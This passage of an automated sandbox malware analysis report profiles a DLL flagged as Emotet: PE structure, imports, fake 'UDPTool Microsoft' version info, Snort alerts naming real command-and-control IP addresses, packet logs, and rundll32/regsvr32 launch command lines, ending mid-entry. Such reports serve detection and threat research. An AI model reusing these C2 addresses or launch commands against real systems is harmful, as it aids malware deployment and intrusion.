                                                                                                                                                                          push edi
                                                                                                                                                                          mov dword ptr [eax], ebp
                                                                                                                                                                          mov ebp, eax
                                                                                                                                                                          mov eax, dword ptr [10057A08h]
                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [ebp-10h], eax

                                                                                                                                                                          Rich Headers

                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [RES] VS2005 build 50727
                                                                                                                                                                          • [ C ] VS2005 build 50727
                                                                                                                                                                          • [EXP] VS2005 build 50727
                                                                                                                                                                          • [C++] VS2005 build 50727
                                                                                                                                                                          • [ASM] VS2005 build 50727
                                                                                                                                                                          • [LNK] VS2005 build 50727

                                                                                                                                                                          Data Directories

                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x313c00x50.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2fdcc0xb4.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x3664.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x610000x3df4.reloc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cd600x40.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x290000x440.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2fd440x40.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                          Sections

                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x27f5e0x28000False0.514996337891data6.66251942868IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x290000x84100x9000False0.308892144097data4.83095023833IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0x320000x2a9a00x27000False0.963572966747data7.93281036967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rsrc0x5d0000x36640x4000False0.274780273438data4.49622273105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .reloc0x610000x82840x9000False0.33251953125data3.82081999119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                          Resources

                                                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                                                          RT_CURSOR0x5db080x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5dc3c0xb4dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5dcf00x134AmigaOS bitmap fontChineseChina
                                                                                                                                                                          RT_CURSOR0x5de240x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5df580x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5e08c0x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5e1c00x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5e2f40x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5e4280x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5e55c0x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5e6900x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5e7c40x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5e8f80x134AmigaOS bitmap fontChineseChina
                                                                                                                                                                          RT_CURSOR0x5ea2c0x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5eb600x134dataChineseChina
                                                                                                                                                                          RT_CURSOR0x5ec940x134dataChineseChina
                                                                                                                                                                          RT_BITMAP0x5edc80xb8dataChineseChina
                                                                                                                                                                          RT_BITMAP0x5ee800x144dataChineseChina
                                                                                                                                                                          RT_ICON0x5efc40x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676ChineseChina
                                                                                                                                                                          RT_ICON0x5f2ac0x128GLS_BINARY_LSB_FIRSTChineseChina
                                                                                                                                                                          RT_DIALOG0x5f3d40x33cdataChineseChina
                                                                                                                                                                          RT_DIALOG0x5f7100xe2dataChineseChina
                                                                                                                                                                          RT_DIALOG0x5f7f40x34dataChineseChina
                                                                                                                                                                          RT_STRING0x5f8280x54dataChineseChina
                                                                                                                                                                          RT_STRING0x5f87c0x2cdataChineseChina
                                                                                                                                                                          RT_STRING0x5f8a80x82dataChineseChina
                                                                                                                                                                          RT_STRING0x5f92c0x1d0dataChineseChina
                                                                                                                                                                          RT_STRING0x5fafc0x164dataChineseChina
                                                                                                                                                                          RT_STRING0x5fc600x132dataChineseChina
                                                                                                                                                                          RT_STRING0x5fd940x50dataChineseChina
                                                                                                                                                                          RT_STRING0x5fde40x40dataChineseChina
                                                                                                                                                                          RT_STRING0x5fe240x6adataChineseChina
                                                                                                                                                                          RT_STRING0x5fe900x1d6dataChineseChina
                                                                                                                                                                          RT_STRING0x600680x110dataChineseChina
                                                                                                                                                                          RT_STRING0x601780x24dataChineseChina
                                                                                                                                                                          RT_STRING0x6019c0x30dataChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x601cc0x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x601f00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602040x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602180x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x6022c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602400x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602540x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602680x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x6027c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602900x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602a40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602b80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602cc0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602e00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_CURSOR0x602f40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
                                                                                                                                                                          RT_GROUP_ICON0x603080x22dataChineseChina
                                                                                                                                                                          RT_VERSION0x6032c0x2e0dataChineseChina
                                                                                                                                                                          RT_MANIFEST0x6060c0x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                          Imports

                                                                                                                                                                          DLLImport
                                                                                                                                                                          KERNEL32.dllCreateFileA, GetCPInfo, GetOEMCP, RtlUnwind, HeapReAlloc, GetCommandLineA, RaiseException, ExitProcess, HeapSize, HeapDestroy, HeapCreate, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, LCMapStringW, GetStdHandle, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetCurrentProcess, GetThreadLocale, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, InterlockedDecrement, FreeResource, GetCurrentProcessId, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, lstrcmpA, GlobalDeleteAtom, GetModuleHandleA, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, CreateThread, CloseHandle, HeapFree, GetNativeSystemInfo, GetProcessHeap, HeapAlloc, FreeLibrary, GetProcAddress, LoadLibraryA, IsBadReadPtr, VirtualProtect, SetLastError, VirtualAlloc, VirtualFree, VirtualQuery, Sleep, GetLastError, lstrlenA, WideCharToMultiByte, CompareStringA, MultiByteToWideChar, GetVersion, LCMapStringA, InterlockedExchange
                                                                                                                                                                          USER32.dllLoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetTopWindow, GetMessageTime, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, UnhookWindowsHookEx, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, SetMenuItemBitmaps, DestroyMenu, UnregisterClassA, GetMessagePos, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, EnableMenuItem, CheckMenuItem, PostQuitMessage, GetMenuState, GetMenuItemID, GetMenuItemCount, GetSubMenu, SetTimer, KillTimer, IsIconic, GetSystemMetrics, GetClientRect, DrawIcon, SendMessageA, ShowWindow, EnableWindow, LoadIconA, PostMessageA, AdjustWindowRectEx
                                                                                                                                                                          GDI32.dllSetWindowExtEx, ScaleWindowExtEx, DeleteDC, GetStockObject, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetDeviceCaps, DeleteObject, SetMapMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap
                                                                                                                                                                          WINSPOOL.DRVDocumentPropertiesA, ClosePrinter, OpenPrinterA
                                                                                                                                                                          ADVAPI32.dllRegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
                                                                                                                                                                          SHLWAPI.dllPathFindExtensionA
                                                                                                                                                                          OLEAUT32.dllVariantClear, VariantChangeType, VariantInit
                                                                                                                                                                          WS2_32.dllsendto, recvfrom, WSAStartup, inet_addr, htons, socket, bind, setsockopt, WSACleanup, closesocket, htonl

                                                                                                                                                                          Exports

                                                                                                                                                                          NameOrdinalAddress
                                                                                                                                                                          DllRegisterServer10x10008af0

                                                                                                                                                                          Version Infos

                                                                                                                                                                          DescriptionData
                                                                                                                                                                          LegalCopyright (C) 2014
                                                                                                                                                                          InternalNameUDPTool
                                                                                                                                                                          FileVersion1, 0, 0, 1
                                                                                                                                                                          CompanyName
                                                                                                                                                                          LegalTrademarks
                                                                                                                                                                          ProductNameUDPTool
                                                                                                                                                                          ProductVersion1, 0, 0, 1
                                                                                                                                                                          FileDescriptionUDPTool Microsoft
                                                                                                                                                                          OriginalFilenameUDPTool.EXE
                                                                                                                                                                          Translation0x0804 0x04b0

                                                                                                                                                                          Possible Origin

                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          ChineseChina
                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                          Network Behavior

                                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                          01/14/22-11:25:46.420372TCP2404332ET CNC Feodo Tracker Reported CnC Server TCP group 174975780192.168.2.545.138.98.34
                                                                                                                                                                          01/14/22-11:25:47.697915TCP2404338ET CNC Feodo Tracker Reported CnC Server TCP group 20497588080192.168.2.569.16.218.101

                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                          TCP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Jan 14, 2022 11:25:46.420372009 CET4975780192.168.2.545.138.98.34
                                                                                                                                                                          Jan 14, 2022 11:25:46.437397003 CET804975745.138.98.34192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:47.049381018 CET4975780192.168.2.545.138.98.34
                                                                                                                                                                          Jan 14, 2022 11:25:47.066426039 CET804975745.138.98.34192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:47.660542965 CET4975780192.168.2.545.138.98.34
                                                                                                                                                                          Jan 14, 2022 11:25:47.678090096 CET804975745.138.98.34192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:47.697915077 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:47.829353094 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:47.829482079 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:47.910691977 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:48.041912079 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:48.055085897 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:48.055130005 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:48.055160999 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:48.055203915 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:51.154326916 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:51.286668062 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:51.287328959 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:51.287954092 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:51.296139002 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:51.428288937 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:51.974994898 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:51.975110054 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:25:54.971759081 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:54.971784115 CET80804975869.16.218.101192.168.2.5
                                                                                                                                                                          Jan 14, 2022 11:25:54.971910000 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:27:36.338521004 CET497588080192.168.2.569.16.218.101
                                                                                                                                                                          Jan 14, 2022 11:27:36.338577032 CET497588080192.168.2.569.16.218.101

                                                                                                                                                                          Code Manipulations

                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:26
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll"
                                                                                                                                                                          Imagebase:0x1a0000
                                                                                                                                                                          File size:116736 bytes
                                                                                                                                                                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.286552378.0000000001500000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.263438129.0000000001500000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.288122197.0000000002F51000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.261789645.0000000002F51000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.263623393.0000000002F51000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.287905795.0000000001500000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.261326526.0000000001500000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.287008332.0000000002F51000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.315220757.0000000001500000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:26
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1
                                                                                                                                                                          Imagebase:0x150000
                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:27
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\xxWrY2YG7s.dll
                                                                                                                                                                          Imagebase:0x1320000
                                                                                                                                                                          File size:20992 bytes
                                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.253587065.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.253623838.0000000000E61000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:27
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",#1
                                                                                                                                                                          Imagebase:0xcc0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.254173027.0000000004610000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.254208432.0000000004741000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:27
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\xxWrY2YG7s.dll,DllRegisterServer
                                                                                                                                                                          Imagebase:0xcc0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.304824769.00000000050E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.304733316.00000000050B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.305003073.00000000051E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.304040907.00000000030C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.305075397.0000000005210000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.305144261.0000000005241000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.304925939.00000000051B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.304079394.00000000030F1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:28
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",DllRegisterServer
                                                                                                                                                                          Imagebase:0xcc0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:28
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\xxWrY2YG7s.dll",DllRegisterServer
                                                                                                                                                                          Imagebase:0xcc0000
                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264383402.0000000004AE1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264309085.0000000004851000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264108438.0000000004660000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264358890.0000000004AB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264257364.00000000047F1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264036329.0000000004540000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264146263.0000000004691000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264222347.00000000047C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.263454210.0000000000AF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264062913.0000000004571000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.264280922.0000000004820000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:31
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                          Imagebase:0x7ff797770000
                                                                                                                                                                          File size:51288 bytes
                                                                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high

                                                                                                                                                                          General

                                                                                                                                                                          Start time:11:25:31
                                                                                                                                                                          Start date:14/01/2022
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
